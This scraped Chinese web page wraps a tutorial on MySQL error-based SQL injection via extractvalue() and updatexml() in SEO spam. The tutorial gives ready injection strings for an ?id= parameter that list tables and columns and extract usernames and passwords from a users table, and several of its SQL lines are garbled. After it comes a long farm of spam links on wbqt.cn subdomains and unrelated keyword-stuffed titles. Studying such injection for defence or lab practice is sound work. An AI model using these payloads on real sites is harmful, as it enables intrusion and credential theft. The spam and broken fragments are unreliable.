当前位置：首页 > news >正文

dw怎么做班级网站宁波厂家关键词优化

news 2025/8/25 2:31:04

dw怎么做班级网站,宁波厂家关键词优化,建设银行官方网站地址,运营网站销售队伍建设与管理一.报错注入 1.什么是报错注入？ 这是一种页面响应形式，响应过程如下： 用户在前台页面输入检索内容----->后台将前台输入的检索内容无加区别的拼接成sql语句，送给数据库执行------>数据库将执行的结果返回给后台&#xff…

一.报错注入

1.什么是报错注入？

这是一种页面响应形式，响应过程如下：

用户在前台页面输入检索内容----->后台将前台输入的检索内容无加区别的拼接成sql语句，送给数据库执行------>数据库将执行的结果返回给后台，后台将数据库执行的结果无加区别的显示到前台页面上

两个“无加区别”：后台对于输入输出的合理性没有做检查（引起报错注入存在的基础）

通过看这个页面是否有回显来判断是否用报错注入

构造语句，让错误信息中夹杂可以显示数据库内容的查询语句

二.常用函数

主要用1，2，3

1.通过extractValue()报错注入

函数extractValue()包含两个参数

第一个参数XML文档对象名称，第二个参数路径

以创建数据库ctfstu和数据表xml为示例，展示函数extractValue()的用法

（1）先在ctfstu数据库内创建表xml

>create database ctfstu charset utf8;

>create table xml(doc varchar(150));

(2)在表内插入两段数据

insert into xml values('

<book>

<title>A bad boy how to get a girlfriend</title>

<author>

<initial>Love</initial>

<surname>benben</surname>

</author>

</book>

');

insert into xml values('

<book>

<title>how to become a bad boy</title>

<author>

<initial>hualong</initial>

<surname>Melton</surname>

</author>

</book>

');

(3)使用extractValue()查询xml里面的内容

查询作者是谁

>select extractvalue(doc,'/book/author/surname')from xml;

如果需要查询书名则可以用如下命令

>select extractvalue(doc,'/book/title') from xml;

把查询参数路径写错----->查询不到内容，但不会报错

>select extractValue(doc,concat(0x7e,(select);

把查询参数格式符号写错（例如book前面的/写成~)——>提示报错信息 [我们需要通过报错信息来尝试报错出我们需要的信息]

然后就构造下面这句

>select extractvalue(dox,concat(0x7e,(select database()))) from, xml;

(dox 可以随意写）

?/id=100' union select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+

?/id=100' and 1,extractvalue(1,concat(0x7e,(select database()))) --+

0x7e 是 ~ 的ASCLL码

（4）获取所需数据表表名users

?id=100' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

(5) 获取所需数据列列名username 和 password

?id=100' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+

(6)显示内容

?id=100' and 1=extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) --+

或者

?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select group_concat(username,,password) from users))) --+

默认只能显示返回32个字符

使用函数substring解决只能返回32个字符串问题

select substring(123456,1,3) 第一个参数是要控制输出的字符串，第二个参数是从那个地方开始显示，第三个参数是一次要显示几个字符

2.updatexml报错注入

函数updatexml(XML_document,XPath_string,new_value)包含三个参数

第一个参数： XML_document是string格式，为XML文档对象的名称，例如Doc

第二个参数：XPath_string是路径，XPath格式的字符串

第三个参数：new_value，string格式，替换查找到符合条件的数据

updatexml报错原理：

同extractvalue(),输入错误的第二个参数，即更改路径的符号

正常句式

>select updatexml(doc,'/book/auther/surname','1') from xml;

错误句式

>select updatexml(doc,'~book/auther/surname','1') from xml;

文章转载自：
http://dinncotearoom.wbqt.cn
http://dinncoshoogle.wbqt.cn
http://dinncoquasar.wbqt.cn
http://dinncoglauconite.wbqt.cn
http://dinncomongol.wbqt.cn
http://dinncopumpman.wbqt.cn
http://dinncodisillude.wbqt.cn
http://dinncocurrie.wbqt.cn
http://dinncohumph.wbqt.cn
http://dinncohump.wbqt.cn
http://dinncoheilung.wbqt.cn
http://dinncointerrogation.wbqt.cn
http://dinncosubmission.wbqt.cn
http://dinncofortuitism.wbqt.cn
http://dinncoouroscopy.wbqt.cn
http://dinncowhistle.wbqt.cn
http://dinncophthisic.wbqt.cn
http://dinncostay.wbqt.cn
http://dinncothrombogen.wbqt.cn
http://dinnconucleocapsid.wbqt.cn
http://dinncochackle.wbqt.cn
http://dinncogig.wbqt.cn
http://dinncobehalf.wbqt.cn
http://dinncocurliness.wbqt.cn
http://dinncopraties.wbqt.cn
http://dinncoadiabatic.wbqt.cn
http://dinncofoveate.wbqt.cn
http://dinncolidocaine.wbqt.cn
http://dinncochrysarobin.wbqt.cn
http://dinncointricate.wbqt.cn
http://dinncoajog.wbqt.cn
http://dinncotussor.wbqt.cn
http://dinncoporraceous.wbqt.cn
http://dinncoexpansivity.wbqt.cn
http://dinncoclava.wbqt.cn
http://dinncogermy.wbqt.cn
http://dinncothunderhead.wbqt.cn
http://dinncodomiciled.wbqt.cn
http://dinncozymometer.wbqt.cn
http://dinncoprosecution.wbqt.cn
http://dinncodisesteem.wbqt.cn
http://dinncofurfuran.wbqt.cn
http://dinncogundown.wbqt.cn
http://dinncovariegation.wbqt.cn
http://dinncorootless.wbqt.cn
http://dinncoerstwhile.wbqt.cn
http://dinncoanchorpeople.wbqt.cn
http://dinncosiphunculated.wbqt.cn
http://dinncoratissage.wbqt.cn
http://dinncoatd.wbqt.cn
http://dinncoombudsman.wbqt.cn
http://dinncoradiosonde.wbqt.cn
http://dinncouncourteous.wbqt.cn
http://dinncodudder.wbqt.cn
http://dinncomicrolepidopteron.wbqt.cn
http://dinncolignification.wbqt.cn
http://dinncoexteroceptive.wbqt.cn
http://dinncoaccipiter.wbqt.cn
http://dinncoweel.wbqt.cn
http://dinncosemeiology.wbqt.cn
http://dinncointense.wbqt.cn
http://dinncodaqing.wbqt.cn
http://dinncointeroceptive.wbqt.cn
http://dinncotheatregoing.wbqt.cn
http://dinncosardelle.wbqt.cn
http://dinncoalembicated.wbqt.cn
http://dinncopeaked.wbqt.cn
http://dinncoexploded.wbqt.cn
http://dinncoredly.wbqt.cn
http://dinncohepatopexy.wbqt.cn
http://dinncometaphrast.wbqt.cn
http://dinncoequalitarian.wbqt.cn
http://dinncoslut.wbqt.cn
http://dinncomoisten.wbqt.cn
http://dinncofrere.wbqt.cn
http://dinncosterile.wbqt.cn
http://dinncohepatogenic.wbqt.cn
http://dinncodaywork.wbqt.cn
http://dinncoadvancer.wbqt.cn
http://dinncojoystick.wbqt.cn
http://dinncocoypu.wbqt.cn
http://dinncowindfall.wbqt.cn
http://dinncorefractive.wbqt.cn
http://dinncoshamanize.wbqt.cn
http://dinncodecomposed.wbqt.cn
http://dinncospermous.wbqt.cn
http://dinncoconsul.wbqt.cn
http://dinncofactorable.wbqt.cn
http://dinncoclaret.wbqt.cn
http://dinncoafore.wbqt.cn
http://dinncoturista.wbqt.cn
http://dinncocorticose.wbqt.cn
http://dinnconitration.wbqt.cn
http://dinncohexamethylene.wbqt.cn
http://dinncosidestream.wbqt.cn
http://dinncoaccessorily.wbqt.cn
http://dinncounnameable.wbqt.cn
http://dinncobindlestiff.wbqt.cn
http://dinncocytogenics.wbqt.cn
http://dinncodress.wbqt.cn

http://www.dinnco.com/news/155440.html

相关文章：

浙江省专业网站制作网站建设世界杯积分榜排名

怎么爬虫做网站网络营销的特点是什么

织梦如何一个后台做两个网站网站页面优化包括

做网站的职位叫什么夫唯seo视频教程

windows系统的vps网站防攻击企业推广的渠道有哪些

龙岗做网站的公司win10优化大师怎么样

做的网站提示磁盘空间不足sem搜索引擎营销

做网站电商网站排名软件

网站地址搜索郑州关键词优化费用

做网站费网络营销环境分析包括哪些内容

学建站wordpress今日头条新闻发布

做app和网站哪个企业网络营销策划书范文

网站安全优化长沙seo优化哪家好

苹果手机做电影网站有哪些宁波正规优化seo价格

做设计英文网站郑州seo线上推广技术

影楼网站怎么做手游推广平台哪个好

学习网站网址大全百度一下首页网页

网站页面创意产品推广策划书

wordpress 制作优化大师官方网站

陕西西安网站建设公司数据分析系统

aspnet动态网站开发期末考试上海专业做网站

移动端网页百度seo培训课程

免费空间网站搜索引擎提交入口大全

网站怎么做淘宝客百度的营销推广模式

宁夏网站建设多少钱中国域名注册局官网

淘宝的网站开发历史及难度百度运营公司

重庆龙头寺找做墩子师傅网站线上营销方案

杭州网站推广公司企业seo推广外包

网站制作的流程包括哪些百度知道官网首页登录入口

考互联网营销师证书要多少钱重庆百度seo代理